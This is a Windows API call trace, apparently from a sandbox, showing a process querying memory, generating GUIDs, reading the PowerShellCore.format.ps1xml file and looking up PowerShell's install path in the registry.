	[0379.472] VirtualQuery (in: lpAddress=0x14b6e0, lpBuffer=0x14c5a0, dwLength=0x30 | out: lpBuffer=0x14c5a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.472] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.472] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.472] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.472] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.472] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xc60efa3a, Data2=0xd79c, Data3=0x4802, Data4=([0]=0xbb, [1]=0x14, [2]=0x3a, [3]=0xb6, [4]=0x62, [5]=0x6b, [6]=0x81, [7]=0x45))) returned 0x0
	[0379.473] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x9aa578a3, Data2=0x683f, Data3=0x4b03, Data4=([0]=0xa8, [1]=0x8e, [2]=0xaa, [3]=0x26, [4]=0x1, [5]=0x1a, [6]=0x53, [7]=0xe9))) returned 0x0
	[0379.473] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x13d11e9c, Data2=0x8103, Data3=0x43ee, Data4=([0]=0x8c, [1]=0x75, [2]=0x28, [3]=0xf, [4]=0x80, [5]=0xaa, [6]=0x58, [7]=0x88))) returned 0x0
	[0379.473] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x9d6da1bf, Data2=0x7ba, Data3=0x4441, Data4=([0]=0x84, [1]=0x42, [2]=0x69, [3]=0xef, [4]=0x93, [5]=0xe6, [6]=0x67, [7]=0xd0))) returned 0x0
	[0379.473] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x9bc7d7c7, Data2=0x2267, Data3=0x4d74, Data4=([0]=0xa2, [1]=0xd0, [2]=0xf7, [3]=0x58, [4]=0xa1, [5]=0x74, [6]=0x2b, [7]=0xe7))) returned 0x0
	[0379.473] VirtualQuery (in: lpAddress=0x14b7f0, lpBuffer=0x14c6b0, dwLength=0x30 | out: lpBuffer=0x14c6b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.474] VirtualQuery (in: lpAddress=0x14b880, lpBuffer=0x14c740, dwLength=0x30 | out: lpBuffer=0x14c740*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.474] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x7b240bb6, Data2=0xde83, Data3=0x45d6, Data4=([0]=0xab, [1]=0x4a, [2]=0xc3, [3]=0x4, [4]=0x30, [5]=0x21, [6]=0xe3, [7]=0xeb))) returned 0x0
	[0379.474] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xc8d0383c, Data2=0xf318, Data3=0x4491, Data4=([0]=0xbb, [1]=0x9f, [2]=0x8d, [3]=0xa, [4]=0xa5, [5]=0x3e, [6]=0x69, [7]=0xc6))) returned 0x0
	[0379.474] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x6f202a79, Data2=0xe7d6, Data3=0x48cd, Data4=([0]=0x85, [1]=0x93, [2]=0xbd, [3]=0xc8, [4]=0x7d, [5]=0xa2, [6]=0x6, [7]=0x3b))) returned 0x0
	[0379.474] SetErrorMode (uMode=0x1) returned 0x1
	[0379.475] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0379.475] SetErrorMode (uMode=0x1) returned 0x1
	[0379.475] GetFileType (hFile=0x300) returned 0x1
	[0379.475] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.476] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.476] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.476] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.476] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.477] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.477] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.477] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.786] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.786] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.787] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.787] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.787] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.787] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.787] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.787] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.787] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.788] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.788] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.788] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.788] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.788] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0xe67, lpOverlapped=0x0) returned 1
	[0379.789] ReadFile (in: hFile=0x300, lpBuffer=0x2ee0c8f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee0c8f*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0379.789] ReadFile (in: hFile=0x300, lpBuffer=0x2ee16c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ee16c0*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0379.789] SetErrorMode (uMode=0x1) returned 0x1
	[0379.789] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cf80 | out: lpFileInformation=0x14cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0379.789] SetErrorMode (uMode=0x1) returned 0x1
	[0379.789] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d068 | out: phkResult=0x14d068*=0x300) returned 0x0
	[0379.789] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfec, lpData=0x0, lpcbData=0x14cfe8*=0x0 | out: lpType=0x14cfec*=0x1, lpData=0x0, lpcbData=0x14cfe8*=0x56) returned 0x0
	[0379.789] CoTaskMemAlloc (cb=0x5a) returned 0x42efa0
	[0379.789] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfbc, lpData=0x42efa0, lpcbData=0x14cfb8*=0x56 | out: lpType=0x14cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cfb8*=0x56) returned 0x0
	[0379.789] CoTaskMemFree (pv=0x42efa0) 
	[0379.790] RegCloseKey (hKey=0x300) returned 0x0
	[0379.791] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x47857fc6, Data2=0x43f8, Data3=0x431e, Data4=([0]=0x9a, [1]=0xa9, [2]=0xfe, [3]=0xec, [4]=0x23, [5]=0x38, [6]=0xdd, [7]=0x91))) returned 0x0
	[0379.791] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xfe8b7c53, Data2=0x368, Data3=0x42aa, Data4=([0]=0x8c, [1]=0xb0, [2]=0x75, [3]=0x33, [4]=0xd7, [5]=0x93, [6]=0xc5, [7]=0x69))) returned 0x0
	[0379.791] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xabe3989b, Data2=0xe2ed, Data3=0x412a, Data4=([0]=0xad, [1]=0xfd, [2]=0x3f, [3]=0x9f, [4]=0x4b, [5]=0xb3, [6]=0xea, [7]=0xb4))) returned 0x0
	[0379.791] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xa82faeb8, Data2=0xc5fd, Data3=0x4af8, Data4=([0]=0xbf, [1]=0x73, [2]=0xc, [3]=0x3c, [4]=0x98, [5]=0x6e, [6]=0xb4, [7]=0x20))) returned 0x0
	[0379.791] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x692121c9, Data2=0x3635, Data3=0x465d, Data4=([0]=0xab, [1]=0x69, [2]=0xd0, [3]=0xa4, [4]=0xc6, [5]=0x6c, [6]=0x95, [7]=0x15))) returned 0x0
	[0379.791] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x924134d0, Data2=0xb49a, Data3=0x4a8d, Data4=([0]=0xa4, [1]=0x27, [2]=0xc4, [3]=0x9b, [4]=0x41, [5]=0xc5, [6]=0x41, [7]=0x44))) returned 0x0
	[0379.791] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x31d863e4, Data2=0xeaba, Data3=0x404f, Data4=([0]=0xb2, [1]=0xb0, [2]=0xd7, [3]=0x56, [4]=0x83, [5]=0xd3, [6]=0xfd, [7]=0x4e))) returned 0x0
	[0379.792] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.792] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x26b58303, Data2=0xfd14, Data3=0x4dc4, Data4=([0]=0xbb, [1]=0x1e, [2]=0x40, [3]=0x3d, [4]=0xd3, [5]=0x51, [6]=0xee, [7]=0xb3))) returned 0x0
	[0379.792] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x7b7fee8f, Data2=0xca1e, Data3=0x49e4, Data4=([0]=0x97, [1]=0x60, [2]=0x9a, [3]=0xe5, [4]=0x20, [5]=0xbb, [6]=0xd0, [7]=0x2f))) returned 0x0
	[0379.792] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x6736b7cc, Data2=0x17ca, Data3=0x4dfc, Data4=([0]=0xa0, [1]=0x4d, [2]=0xf1, [3]=0x16, [4]=0xb7, [5]=0xf0, [6]=0x15, [7]=0xdf))) returned 0x0
	[0379.792] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x289ee227, Data2=0x2ae3, Data3=0x443f, Data4=([0]=0x81, [1]=0x5b, [2]=0x62, [3]=0x4, [4]=0x94, [5]=0xb1, [6]=0xbe, [7]=0xd6))) returned 0x0
	[0379.792] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x621d625c, Data2=0x748e, Data3=0x45e7, Data4=([0]=0x81, [1]=0x13, [2]=0x61, [3]=0xd4, [4]=0x88, [5]=0x38, [6]=0xc0, [7]=0x27))) returned 0x0
	[0379.792] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xda3f65b3, Data2=0x9fe7, Data3=0x47eb, Data4=([0]=0x86, [1]=0xea, [2]=0xe1, [3]=0xc6, [4]=0xcb, [5]=0x1d, [6]=0x37, [7]=0xb2))) returned 0x0
	[0379.792] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x1b7db9e5, Data2=0xe257, Data3=0x4e55, Data4=([0]=0x86, [1]=0x72, [2]=0x95, [3]=0x3b, [4]=0xad, [5]=0x32, [6]=0x60, [7]=0x15))) returned 0x0
	[0379.792] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xf5340c9c, Data2=0xf4ec, Data3=0x4088, Data4=([0]=0xb2, [1]=0xe, [2]=0xbb, [3]=0x5e, [4]=0xe0, [5]=0xf2, [6]=0x6f, [7]=0xf6))) returned 0x0
	[0379.793] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x8d68e284, Data2=0xbc68, Data3=0x4128, Data4=([0]=0x85, [1]=0x25, [2]=0x72, [3]=0x4d, [4]=0x41, [5]=0xee, [6]=0x5d, [7]=0xe7))) returned 0x0
	[0379.793] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x4e051016, Data2=0x8ca0, Data3=0x4015, Data4=([0]=0xab, [1]=0x69, [2]=0x27, [3]=0x8a, [4]=0x4c, [5]=0xfd, [6]=0xae, [7]=0x4f))) returned 0x0
	[0379.793] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x5cfef3aa, Data2=0xcf7c, Data3=0x4b6c, Data4=([0]=0xb8, [1]=0x40, [2]=0xdc, [3]=0x32, [4]=0x7d, [5]=0x5d, [6]=0x3d, [7]=0x6))) returned 0x0
	[0379.793] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x88489ce9, Data2=0x22fd, Data3=0x426a, Data4=([0]=0xbb, [1]=0x7b, [2]=0xf3, [3]=0x73, [4]=0xb8, [5]=0x29, [6]=0x21, [7]=0x0))) returned 0x0
	[0379.793] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.793] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.793] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.793] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x6b06dd39, Data2=0x2177, Data3=0x44f8, Data4=([0]=0xa1, [1]=0xfb, [2]=0x7e, [3]=0xd5, [4]=0xeb, [5]=0xbe, [6]=0x54, [7]=0x8e))) returned 0x0
	[0379.794] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x94cabf5e, Data2=0x1644, Data3=0x44b1, Data4=([0]=0xa6, [1]=0x16, [2]=0xb0, [3]=0x4a, [4]=0x4d, [5]=0xd6, [6]=0x24, [7]=0x12))) returned 0x0
	[0379.794] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xbd23c899, Data2=0xb1b8, Data3=0x4d3c, Data4=([0]=0xb5, [1]=0x2a, [2]=0x3, [3]=0xb3, [4]=0x73, [5]=0x35, [6]=0xd2, [7]=0xf))) returned 0x0
	[0379.794] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x668def9, Data2=0xb30d, Data3=0x4e26, Data4=([0]=0x93, [1]=0x74, [2]=0x38, [3]=0xe0, [4]=0x91, [5]=0x86, [6]=0xfc, [7]=0xa8))) returned 0x0
	[0379.794] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x6f944775, Data2=0xe095, Data3=0x4e00, Data4=([0]=0x97, [1]=0x1d, [2]=0x97, [3]=0x23, [4]=0xbd, [5]=0xa4, [6]=0x51, [7]=0xcb))) returned 0x0
	[0379.794] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xbd6e1c2b, Data2=0xec60, Data3=0x43eb, Data4=([0]=0xa7, [1]=0x8a, [2]=0xd9, [3]=0x31, [4]=0xfc, [5]=0xe7, [6]=0x9, [7]=0x45))) returned 0x0
	[0379.794] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x8813b9fd, Data2=0x3ad2, Data3=0x4270, Data4=([0]=0xb0, [1]=0x79, [2]=0xb0, [3]=0x7e, [4]=0xb2, [5]=0xf6, [6]=0xcb, [7]=0x8e))) returned 0x0
	[0379.794] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xebb2a6a2, Data2=0x5f39, Data3=0x4eee, Data4=([0]=0x8d, [1]=0xa7, [2]=0x8d, [3]=0x4b, [4]=0x1a, [5]=0x7e, [6]=0x87, [7]=0xe6))) returned 0x0
	[0379.794] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xb6b39228, Data2=0x6696, Data3=0x4c4d, Data4=([0]=0xa5, [1]=0xb1, [2]=0x9, [3]=0x3f, [4]=0xf3, [5]=0xda, [6]=0x67, [7]=0x1a))) returned 0x0
	[0379.794] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x3f26b963, Data2=0x4bb9, Data3=0x4659, Data4=([0]=0xb4, [1]=0x94, [2]=0x69, [3]=0x66, [4]=0xc2, [5]=0xbe, [6]=0xa3, [7]=0x18))) returned 0x0
	[0379.794] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xc72024b6, Data2=0xcc9, Data3=0x4444, Data4=([0]=0x96, [1]=0xcd, [2]=0xe2, [3]=0x9, [4]=0x7e, [5]=0xf6, [6]=0x5, [7]=0xef))) returned 0x0
	[0379.795] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x3658cc7, Data2=0xa519, Data3=0x4c6f, Data4=([0]=0xb1, [1]=0xc, [2]=0xb8, [3]=0x17, [4]=0x43, [5]=0x60, [6]=0x1a, [7]=0x1e))) returned 0x0
	[0379.795] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xdd8788c3, Data2=0xf76b, Data3=0x4b73, Data4=([0]=0xb9, [1]=0x31, [2]=0x45, [3]=0x96, [4]=0xfb, [5]=0x98, [6]=0xa6, [7]=0x43))) returned 0x0
	[0379.795] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.795] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x7a6ed0e2, Data2=0xe886, Data3=0x45e5, Data4=([0]=0xb2, [1]=0xa2, [2]=0x4b, [3]=0xf2, [4]=0x1b, [5]=0x4b, [6]=0xf8, [7]=0xcd))) returned 0x0
	[0379.795] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.796] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.796] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x481139e, Data2=0xa972, Data3=0x43b7, Data4=([0]=0xa3, [1]=0x8b, [2]=0x96, [3]=0x68, [4]=0xb1, [5]=0x2e, [6]=0x10, [7]=0x95))) returned 0x0
	[0379.796] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.797] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x7ecc8af1, Data2=0x416a, Data3=0x4871, Data4=([0]=0x94, [1]=0xc7, [2]=0x98, [3]=0x58, [4]=0x5e, [5]=0x89, [6]=0x21, [7]=0x33))) returned 0x0
	[0379.797] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xe83a1988, Data2=0x1707, Data3=0x42ce, Data4=([0]=0x87, [1]=0x61, [2]=0x5c, [3]=0x5e, [4]=0xa0, [5]=0x39, [6]=0x16, [7]=0xc3))) returned 0x0
	[0379.797] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xe56805e, Data2=0x9a50, Data3=0x4723, Data4=([0]=0x85, [1]=0x99, [2]=0x11, [3]=0xd5, [4]=0x95, [5]=0x25, [6]=0x47, [7]=0xd7))) returned 0x0
	[0379.797] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x61346a9a, Data2=0xc308, Data3=0x417e, Data4=([0]=0x93, [1]=0x27, [2]=0x24, [3]=0xd5, [4]=0x58, [5]=0xf0, [6]=0x58, [7]=0x26))) returned 0x0
	[0379.797] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xf19a7045, Data2=0x563a, Data3=0x4259, Data4=([0]=0xb9, [1]=0x52, [2]=0x10, [3]=0x14, [4]=0xd9, [5]=0x61, [6]=0x8, [7]=0x96))) returned 0x0
	[0379.797] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x8db70234, Data2=0xfbf7, Data3=0x4465, Data4=([0]=0xa4, [1]=0x89, [2]=0x82, [3]=0x7e, [4]=0xf1, [5]=0x70, [6]=0x51, [7]=0x6c))) returned 0x0
